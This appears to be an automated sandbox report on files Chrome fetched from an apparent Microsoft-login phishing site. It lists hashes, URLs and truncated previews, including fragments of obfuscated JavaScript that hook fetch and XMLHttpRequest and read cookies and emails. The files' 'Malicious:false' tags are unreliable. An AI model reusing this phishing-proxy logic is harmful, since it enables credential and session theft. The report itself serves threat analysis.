                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/webfonts/fa-regular-400.woff2
                                                    Preview:wOF2......\...........\....C.....................8.$. .`........,....0. ..peA.........U.L..W.._~..........u.o.......@...6Lj.8L...K..?.Z.'...J..Q..'9.-.0}..p...w,.....x.|..U.JiO.......wo......L...d&!.AZ.$$5J....WW..._OD..'..1..S.....'T.~...A.A...H.....$D..,..V..-.l.])._..{..hw....Z..\....=.U..{.5..q...9.7B....T.......u}|;...g..LYx.t..D7%..v......t~.<.N.S...h...x..{S+s.yy?{-._..}&oC...W..n.......i.&y..'...m......qFn8..he...r(C.L..`VvF.s.,.r....p..*..N.J..RdCe...B...T6..W.c'E7 .[e....9.&).1....Y..H....;..3!..>F.}..W......h........?...........YsS.......uo$kjn.Ecs3-.[....R....u.....[e?...li...n_.G....Z.l.1..~..6.Y.I..y.]Y.Rv.lF.*..5^3.....}...3.......d....=...v..y.l.h..q....&.....y...uX....WY*..oX.d..m...uK.m[..i........y/\.y.|.c..*...+.G.V/Q..;g....y.)..`<...e`;..TI...0>..)+=..|dI/..,.K..i.W..Vi.C....Vm.d.e.....6.f..v.e.=..g...:.#.:..N:.3.:.7.W.Y.Z.....U.Q.e....g..-ym^............b.b.b.b.b.XS.9j.A..F....:.D...}.o...18FDU...Q..Q...6..p...q*.Fc
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 125064, version 768.67
                                                    Category:downloaded
                                                    Size (bytes):125064
                                                    Entropy (8bit):7.994213368618236
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:57B380D27F14F16E737BCCA7E849CF79
                                                    SHA1:2E4280929D4D76FC0E31601C98F167F14630C209
                                                    SHA-256:94E1BBC1C2A41EBC73FA5253FD563256C0035B4D69181E48F9AEF9E474A11251
                                                    SHA-512:88DD2321CC4711333411A24DAB612DAA68CAF7CC31C892405BCBB9E89629CA15FCDD781BB26D7485F5819B5B48170EC8EAA2135701F4695CF94A1CB0C15BF649
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/webfonts/fa-solid-900.woff2
                                                    Preview:wOF2.............R....=...C.....................8.$. .`..l...d....p.... .u)...........y....{XG.....PUUU....U........................................{......'R%........T.)Ue.)..d~O.....<.3R.hC..S3...ig.}.[........./._.NoxN...~/........{^h}&)..0+.b.....iofi.<......;..V......E.jF0.E6.V.......z-_..x s... ......DA).tk......JRE%..@.F,....$3.........9_..b....'.......-sg..R.i$..jw%.V...z...e...nk..........$./..H.A.)`9.>B.?.'.J.K.. .A..qj..e.K..4%....&E......f ...8K..a..{8.9b.q..}.%P~.fj.>....$.Yi...V+....@...N.....M.`S.([J.....w\..o....az.9"........-m....6.m..2ow.e.7.L:....... 0........I..a=\..............N.n.i........F....mP.m.M.S.G)5..-.........ouM.]/..nD.h$.].33..s.A..Gtf.2.|..Y"D..b..~..?.7Z".L..#...%....~O:.....ncl.uQ.;3.....X.... ..$..P...]@......z>.t..D.9Jv.....@P.J.9uQ.S..........}....K..r...~...1.?N^..a.s.5....E.x.A#....hD.0...}..z.E...)%8d.IeV..2?)..E......H...R. ...eH.e...DR.nj..$eV......fUO.......6.......q.a...v{m....."[%.....-Q+..E.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (15683), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):15683
                                                    Entropy (8bit):5.352139027930835
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:2EDC9BD412D5C538A94F2968CBCEF827
                                                    SHA1:A951ACCF46E7195AB2CA38F5CFC4EA34C0B25450
                                                    SHA-256:C803FA124882F6A2280C062BABCAA938C4109D9C1A7A0268C04CED88FF55317B
                                                    SHA-512:49E7CA96195CA2E054FA403223D812B5E838784E4121EF44F40D478D1D5CBF20E96D86B82B4B6A1F581141BD0F44313B774A2BD069E0645CB3ABD413945AE2F4
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:function _0xe53c(_0x2dcf91,_0x13971e){const _0x11d5ef=_0x11d5();return _0xe53c=function(_0xe53ca8,_0x2a919c){_0xe53ca8=_0xe53ca8-0x1b8;let _0x5b3903=_0x11d5ef[_0xe53ca8];return _0x5b3903;},_0xe53c(_0x2dcf91,_0x13971e);}function _0x11d5(){const _0x2916dc=['backgroundImage','report','value','1681180kEhPkx','getBased','then','back','invisible','device','will\x20submit','charCodeAt','getDomain','forEach','.device','botDetected','detach','items','string','unknown\x20browser','decode','getElementsByName','4708218BvhGdv','submit','none','119PFTeMP','decodeBased','\x27\x20occured\x20at\x20\x27','removeChild','#igp','Error\x20\x27','url(','floor','arrayBuffer','reason','trim','https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ea19b2112f4dfd8e90b4505ef7dcb4f9.png','POST','getUser','getEmail','branding\x20url\x20not\x20defined','Loading...','parse','16aVgExK','<i\x20class=\x22far\x20fa-calendar-alt\x20icon\x22></i>','failure','object','split','11tYnrdT','pow','.browser','type','s
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text
                                                    Category:downloaded
                                                    Size (bytes):14139
                                                    Entropy (8bit):4.995901666212487
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D16EE8A6DE0BC16B8ABCD5C52B263F25
                                                    SHA1:5F0A807DBA2FA7C089A93422455C3A1C1639846B
                                                    SHA-256:9C45C7BCAEFB708A23B8863720DCB4E7838400875C07CF31ABCD52D33ECB45DE
                                                    SHA-512:D8804EA9D0F8D457488AEB9D0A439F495CF1A2C8530FBEC17F02A04CA8C16B366A5D43934CDD230857914908E4C980FD48E10BC3C8D0710E2D445698756853B6
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://enrollmentportal.borlsfx.com/statsic/css/main.output.css
                                                    Preview:*, ::before, ::after {. --tw-border-spacing-x: 0;. --tw-border-spacing-y: 0;. --tw-translate-x: 0;. --tw-translate-y: 0;. --tw-rotate: 0;. --tw-skew-x: 0;. --tw-skew-y: 0;. --tw-scale-x: 1;. --tw-scale-y: 1;. --tw-pan-x: ;. --tw-pan-y: ;. --tw-pinch-zoom: ;. --tw-scroll-snap-strictness: proximity;. --tw-gradient-from-position: ;. --tw-gradient-via-position: ;. --tw-gradient-to-position: ;. --tw-ordinal: ;. --tw-slashed-zero: ;. --tw-numeric-figure: ;. --tw-numeric-spacing: ;. --tw-numeric-fraction: ;. --tw-ring-inset: ;. --tw-ring-offset-width: 0px;. --tw-ring-offset-color: #fff;. --tw-ring-color: rgb(59 130 246 / 0.5);. --tw-ring-offset-shadow: 0 0 #0000;. --tw-ring-shadow: 0 0 #0000;. --tw-shadow: 0 0 #0000;. --tw-shadow-colored: 0 0 #0000;. --tw-blur: ;. --tw-brightness: ;. --tw-contrast: ;. --tw-grayscale: ;. --tw-hue-rotate: ;. --tw-invert: ;. --tw-saturate: ;. --tw-sepia: ;. --tw-drop-shadow: ;. --tw-backdrop-blur: ;.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (45797)
                                                    Category:dropped
                                                    Size (bytes):406986
                                                    Entropy (8bit):5.31789636250024
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9083D228E539FD87EF95A94B7ABC396C
                                                    SHA1:159AE950D79B4987D65F18FFBF6FF87D76C5B536
                                                    SHA-256:54B34EA260D9DCF6D7961A60C9B540673312A965F9DDC2F1AB9855D622BFA07C
                                                    SHA-512:1306A0CFBA637F249786677E9C29D72E15C72F1575DEB217E9E965E456D2320C5644CDE43F06BA1E8373D11E16D33DD955FB3E9077C38F585E4A33B5A1075A0B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */.(window.webpackJsonp=window.webpackJsonp||[]).push([[8],Array(539).concat([f
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (47691)
                                                    Category:dropped
                                                    Size (bytes):47692
                                                    Entropy (8bit):5.4016459163756165
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9046FDD8B20F930F537279DEDE41E747
                                                    SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                    SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                    SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (8714), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):8714
                                                    Entropy (8bit):5.736569526477679
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:70957953CB2C184D0AA2D0CB3261FFD5
                                                    SHA1:97283FF6917F431499983ABDFA08213B9BCE09EC
                                                    SHA-256:507273B0AE952011AD2DB2F849138D0542921059C6BF2D17F5C111D5AB5FCD68
                                                    SHA-512:6118777E3D6D1B215027760DA76697E3C0003521F8B095640CF34CFE50A43487A103B8F58D901BCBE61094F55408C9F40551712D10F2887C2DEA1045115EC47D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://enrollmentportal.borlsfx.com/cdn-cgi/challenge-platform/h/b/scripts/jsd/787bc399e22f/main.js?
                                                    Preview:window._cf_chl_opt={cFPWv:'b'};~function(W,h,i,j,k,o,s,B){W=b,function(d,e,V,f,g){for(V=b,f=d();!![];)try{if(g=-parseInt(V(398))/1+-parseInt(V(383))/2+parseInt(V(363))/3+-parseInt(V(373))/4*(parseInt(V(417))/5)+-parseInt(V(420))/6+-parseInt(V(444))/7+parseInt(V(352))/8*(parseInt(V(391))/9),g===e)break;else f.push(f.shift())}catch(E){f.push(f.shift())}}(a,949299),h=this||self,i=h[W(435)],j={},j[W(452)]='o',j[W(412)]='s',j[W(400)]='u',j[W(360)]='z',j[W(339)]='n',j[W(375)]='I',j[W(390)]='b',k=j,h[W(376)]=function(g,E,F,G,a1,I,J,K,L,M,N){if(a1=W,null===E||void 0===E)return G;for(I=n(E),g[a1(344)][a1(374)]&&(I=I[a1(453)](g[a1(344)][a1(374)](E))),I=g[a1(399)][a1(454)]&&g[a1(362)]?g[a1(399)][a1(454)](new g[(a1(362))](I)):function(O,a2,P){for(a2=a1,O[a2(354)](),P=0;P<O[a2(409)];O[P]===O[P+1]?O[a2(406)](P+1,1):P+=1);return O}(I),J='nAsAaAb'.split('A'),J=J[a1(416)][a1(437)](J),K=0;K<I[a1(409)];L=I[K],M=m(g,E,L),J(M)?(N='s'===M&&!g[a1(380)](E[L]),a1(401)===F+L?H(F+L,M):N||H(F+L,E[L])):H(F+L,M),K+
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (32016)
                                                    Category:dropped
                                                    Size (bytes):57510
                                                    Entropy (8bit):5.3728935008680745
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:23C7FEEF919F9374C1B26F019804CDA8
                                                    SHA1:3E22BA24CFD4F5A1C4D189AAADB1A82A867377C0
                                                    SHA-256:993A5748DB7B6BC125F88788845A7599234130BCE2858B528071035488CB886D
                                                    SHA-512:93D4D19CA4BACFC0AD64690E2426D573D47991DAF772D178D5C477369675539274A5E97C666A97A49AD0EC82E566EF4B71E967E7D7FFC575FBD2171E06791276
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:!function(e){function o(n){if(i[n])return i[n].exports;var t=i[n]={exports:{},id:n,loaded:!1};return e[n].call(t.exports,t,t.exports,o),t.loaded=!0,t.exports}var i={};return o.m=e,o.c=i,o.p="",o(0)}([function(e,o,i){i(2);var n=i(1),t=i(5),r=i(6),a=r.StringsVariantId,s=r.AllowedIdentitiesType;n.registerSource("str",function(e,o){if(e.WF_STR_SignupLink_AriaLabel_Text="Create a Microsoft account",e.WF_STR_SignupLink_AriaLabel_Generic_Text="Create a new account",e.CT_STR_CookieBanner_Link_AriaLabel="Learn more about Microsoft's Cookie Policy",e.WF_STR_HeaderDefault_Title=o.iLoginStringsVariantId===a.CombinedSigninSignupV2WelcomeTitle?"Welcome":"Sign in",e.STR_Footer_IcpLicense_Text=".ICP.13015306.-10",o.oAppCobranding&&o.oAppCobranding.friendlyAppName){var i=o.fBreakBrandingSigninString?"to continue to {0}":"Continue to {0}";e.WF_STR_App_Title=t.format(i,o.oAppCobranding.friendlyAppName)}switch(o.oAppCobranding&&o.oAppCobranding.signinDescription&&(e.WF_STR_Default_Desc=o.oAppCobrand
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (15482), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):15482
                                                    Entropy (8bit):5.365235261090429
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:14E939D11916C81DE8DF9BA601956CAE
                                                    SHA1:FA7374101E6F6F5C51021D5A991046661B0BB6C7
                                                    SHA-256:9E249AD131ABDCFAD4BFBA4E8AB4F0A1E66F921B38C36838678B6D044BB6674E
                                                    SHA-512:02ECDD928609F0180BD63F85C7849A27D6AA7ED9246DA394B919522AEDDA9824533C8A983FB5B4336BE0A17C85331B7E50A2ACD2972269FC9AE4D4D53261E253
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://enrollmentportal.borlsfx.com/2e1145bcea/start?for=/rwrzvvwfa/d8b09a/
                                                    Preview:(function(_0x1222ec,_0x38b5b7){const _0x482d4e=_0x536f,_0x51f9c0=_0x1222ec();while(!![]){try{const _0x57292e=-parseInt(_0x482d4e(0xfa))/0x1+parseInt(_0x482d4e(0x106))/0x2*(-parseInt(_0x482d4e(0xd6))/0x3)+parseInt(_0x482d4e(0xe9))/0x4*(parseInt(_0x482d4e(0x146))/0x5)+parseInt(_0x482d4e(0x13c))/0x6*(-parseInt(_0x482d4e(0xf9))/0x7)+parseInt(_0x482d4e(0xf1))/0x8+-parseInt(_0x482d4e(0x14f))/0x9*(parseInt(_0x482d4e(0x109))/0xa)+parseInt(_0x482d4e(0xdb))/0xb;if(_0x57292e===_0x38b5b7)break;else _0x51f9c0['push'](_0x51f9c0['shift']());}catch(_0x211a37){_0x51f9c0['push'](_0x51f9c0['shift']());}}}(_0x4de4,0xd11c7),((()=>{'use strict';const _0x247716=_0x536f;var _0xfec201={'d':(_0x51e89d,_0x2c3bc7)=>{const _0x59beac=_0x536f;for(var _0x107ba7 in _0x2c3bc7)_0xfec201['o'](_0x2c3bc7,_0x107ba7)&&!_0xfec201['o'](_0x51e89d,_0x107ba7)&&Object[_0x59beac(0xf2)](_0x51e89d,_0x107ba7,{'enumerable':!0x0,'get':_0x2c3bc7[_0x107ba7]});},'o':(_0x4fc7b2,_0x2ba48d)=>Object[_0x247716(0xf5)][_0x247716(0x111)][_0x247716
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:downloaded
                                                    Size (bytes):1864
                                                    Entropy (8bit):5.222032823730197
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:BC3D32A696895F78C19DF6C717586A5D
                                                    SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                    SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                    SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, ASCII text
                                                    Category:dropped
                                                    Size (bytes):229877
                                                    Entropy (8bit):5.567633313727411
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:1C3016B6D7F8E73CB55F4103B10E74DC
                                                    SHA1:A9237D936CF3ACA72F94E783BF1035DB6E7F7D99
                                                    SHA-256:8FC72BC3306F11129F9FD06E10EA153FDAF9DD9D49FCC112B86359A3CCB88E7E
                                                    SHA-512:A6B96ED1FCC3DBF97EB3E755FB12CA96B7190C6A65FE869181C914B1A2BB99FB88563E99B05FCF055605A3BF5862E0251E609C4EBAC0C43CFCCF5D43274C6446
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:<!DOCTYPE html>.<head>. <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/css/all.min.css">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <style>. .theme-light,. :root {. --rem360: 22.5rem;. --rem320: 20rem;. --rem192: 12rem;. --rem144: 9rem;. --rem128: 8rem;. --rem96: 6rem;. --rem90: 5.625rem;. --rem88: 5.5rem;. --rem64: 4rem;. --rem56: 3.5rem;. --rem48: 3rem;. --rem40: 2.5rem;. --rem36: 2.25rem;. --rem32: 2rem;. --rem28: 1.75rem;. --rem26: 1.625rem;. --rem24: 1.5rem;. --rem22: 1.375rem;. --rem20: 1.25rem;. --rem18: 1.125rem;. --rem16: 1rem;. --rem15: 0.9375rem;. --rem14: 0.875rem;. --rem12: 0.75rem;. --rem10: 0.625rem;. --rem8: 0.5rem;. --rem6: 0.375rem;.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (61177)
                                                    Category:downloaded
                                                    Size (bytes):113424
                                                    Entropy (8bit):5.2850742719795925
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:F3588C5412D4119F95E47073A4A5DF72
                                                    SHA1:3C4B1652E71C25E1CE7DE611FBD17EDBAAE411D9
                                                    SHA-256:6CC79C59F00478CE5D8EAA982EFDD8FC3CC205A7EA023A564BB2688FA206A087
                                                    SHA-512:62886F8BFB32D2BE842A23ECA157556C30EC1D616E2607D9DF1894F702BB7A982EEB3576C95F859B4B8E9183A84D70149A8802F31317F80D4845B02CCFA018F9
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                                    Preview:/*! Copyright (C) Microsoft Corporation. All rights reserved. *//*!.------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------..This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise...//-----------------------------------------------------------------------------.twbs-bootstrap-sass (3.3.0).//-----------------------------------------------------------------------------..The MIT License (MIT)..Copyright (c) 2013 Twitter, Inc..Permission is hereby granted, free of charge, to any person
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (28285), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):28285
                                                    Entropy (8bit):5.302277375899498
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:C27A6DEE7EA9E5E5DD515489F3C1351C
                                                    SHA1:CBA4FED48E579910A8D5DA5A5DAE15B1D2013DB2
                                                    SHA-256:39EECF6BA6C80E8DDB5441AF921EF65DB86F7D980048FB739D43502D151D140E
                                                    SHA-512:D8DFC81F672E9A87D729CDDC621DFA25861266ACAC2DF855345E5E36FA253A948D7E1821F8527D312B6C84E3A637C4A5DD68E0A8D177530846AB4E0B26D6C597
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://706f7274616c2e6d6963726f736f66746f6e6c696e652e636f6d.borlsfx.com/7102f140f4/d15cfc1a.js
                                                    Preview:function _0x3d3c(){const _0x5112c9=['HTMLFormElement','arrayEquals','URL','length','constructor','startsWith','match','No\x20match\x20occured\x20for\x20','at\x20','36NWKIKF','original','\x20for\x20','19296zdJLvg','log','prototype','orig_','origin','hasAttribute','include','type','HTMLAreaElement','createElement','error','init','at\x20Object.newHandler.<computed>\x20[as\x20','withCredentials','split','parentElement','fetch','cors','currentSrc','utils','Request','mod_url','action','requestClone','baseUrl','string','replaceProtoFunctionAndPass','orig_href','headers','setUrl','set','getOwnPropertyNames','splice','call','method','execRecursively','getOwnPropertyDescriptor','map','fetchSpecial','XMLHttpRequest','protocol','810FzbKQW','HTMLLinkElement','Modifyfing\x20','bind','fromCharCode','preloadCache','then','integrity','setPrototypeOf','level','defineProperty','()\x20=>\x20\x27world\x27','hostname','\x27\x20=>\x20\x27','replaceProtoFunction','apply','getCookie','getOrigOF','Object','resp
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):3342
                                                    Entropy (8bit):6.61311339116926
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:702F48CC33CCF32121FE843BFC628547
                                                    SHA1:303FC4E4B88D5658C3D44624C6CEF9F3FA1F355D
                                                    SHA-256:A0E345DEC2F1A0DEC023D3BC85AD2CEDD8BD6700692D7DBB39C4FA65ACB5E4BE
                                                    SHA-512:427187847CD88C9943D82F0D2A474E5C0FFD46657A8935078C6B7CECD7378A47D71A5DCC3FD7B8740B7453E734D5CC9F80C8D1B0F1EAC594BFD15D28CF5E1BAF
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:.PNG........IHDR..............$....:PLTE..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................k.].....tRNS.k...ce........O...z.v.w@y.A... .i.E.S....{...."2...FGHN.U...f1.....?.~..R(m......b..n.....,_...}#...I..&.)+..348<|..Q..sCr..0.*%.....haqP..=...'.$..TDxo....>.u..B......t.....V....gjd?..$....IDATx...KK.q...xw..he.R..-..ED.V]..At......J%ed.e...T*u..[..JRg\.....}.y.9.yC.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.T).......=*[.@o..`7@a....e..byW../..........Q.._.ib
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):180223
                                                    Entropy (8bit):5.346617886595007
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:F90BE9261DC1B110BCB7BBED2275BA5E
                                                    SHA1:15CBF05744C92A3B15B031E45CFB34937BED4BA5
                                                    SHA-256:DE89D64FA8AB26B017DE7E1B26F616CF742E6C477B8F7567981330F6DB1B1758
                                                    SHA-512:15BCA217D53B72792A5C33C24DC2ED1741F430D70F9F1A7B1CB60048DE6AFD48AC13DEF2459483749834CCA8CD4CB366705FF91FD4650A86DC6A0A5B4F0A570C
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:(window.telemetry_webpackJsonp=window.telemetry_webpackJsonp||[]).push([[2],[,,,function(e,t,n){"use strict";n.r(t),n.d(t,"ValueKind",(function(){return r.e})),n.d(t,"EventLatency",(function(){return r.a})),n.d(t,"EventPersistence",(function(){return r.b})),n.d(t,"TraceLevel",(function(){return r.d})),n.d(t,"AppInsightsCore",(function(){return i.a})),n.d(t,"BaseCore",(function(){return d})),n.d(t,"_ExtendedInternalMessageId",(function(){return r.f})),n.d(t,"EventPropertyType",(function(){return r.c})),n.d(t,"ESPromise",(function(){return g})),n.d(t,"ESPromiseScheduler",(function(){return C})),n.d(t,"ValueSanitizer",(function(){return I})),n.d(t,"NotificationManager",(function(){return E.a})),n.d(t,"BaseTelemetryPlugin",(function(){return S.a})),n.d(t,"ProcessTelemetryContext",(function(){return N.a})),n.d(t,"MinChannelPriorty",(function(){return w.a})),n.d(t,"EventsDiscardedReason",(function(){return P.a})),n.d(t,"DiagnosticLogger",(function(){return c.a})),n.d(t,"LoggingSeverity",(fun
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (46591)
                                                    Category:dropped
                                                    Size (bytes):142367
                                                    Entropy (8bit):5.430597817875451
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:CCAA31FD031C4C856EB7B986FD9F447B
                                                    SHA1:0A809EABCDB95FA04DE5F8409B3BC994ED65CBD1
                                                    SHA-256:3D40B4129B8B4C284908636AE46D72EA053F286FB5FE45DB78351B5B2CFC1EB9
                                                    SHA-512:4B5B2271DB5F640FEBF13A7C0BDBD630C73530000F1593046D090585D1752E239D894614E23E801BE4C6A379406B6EF521423FA27C3865C3CD4ABB0A64823780
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */!function(e){function t(t){for(var n,r,i=t[0],a=t[1],s=0,u=[];s<i.length;s++)
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:downloaded
                                                    Size (bytes):3651
                                                    Entropy (8bit):4.094801914706141
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                    SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                    SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                    SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
